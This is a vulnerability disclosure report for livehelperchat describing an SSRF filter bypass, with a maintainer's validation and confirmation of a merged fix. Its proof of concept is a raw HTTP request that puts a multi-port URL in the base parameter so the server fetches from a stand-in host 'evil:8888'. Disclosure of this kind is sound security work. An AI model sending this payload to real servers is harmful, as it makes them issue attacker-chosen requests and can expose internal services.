SSRF filter bypass port 80, 433 in livehelperchat/livehelperchat

Valid

Reported on

Apr 4th 2022


Description

To exploit vulnerability, someone must pass a "base" parameters with a url multi-port to bypass filter check.

Proof of Concept

GET /index.php/cobrowse/proxycss/1?base=http://evil:8888:80/&css=index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: SESS02163d6deb6c206a82729b5648c7ccb7=VGWS8m-s8l4LTBWIdx4SLEWp_4CV9zQUVMQe3TH-r5k; sugar_user_theme=SuiteP; ck_login_id_20=1; ck_login_language_20=en_us; lhc_rm_u=OZNdQ2asyhNnFWUiUssqS4RZIpsGw1%3A2%3A8832b6cb3f51bd8dfb6ef6068cca39ad9425a209; lhc_vid=592659a2bfdb4f609558
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1


the server will make http request to evil:8888

Impact

An attacker could make the application perform arbitrary requests, bypass CVE-2022-1191

We are processing your report and will contact the livehelperchat team within 24 hours. 2 months ago
Nhien.IT modified the report
2 months ago
Nhien.IT modified the report
2 months ago
Nhien.IT modified the report
2 months ago
Remigijus Kiminas validated this vulnerability 2 months ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
Remigijus Kiminas confirmed that a fix has been merged on abc959 2 months ago
The fix bounty has been dropped
Remigijus
2 months ago

Maintainer


Next time you can just crate here an issue, no need to duplicate in github :)

Nhien.IT
2 months ago

Researcher


Yeah, thank bro XD

to join this conversation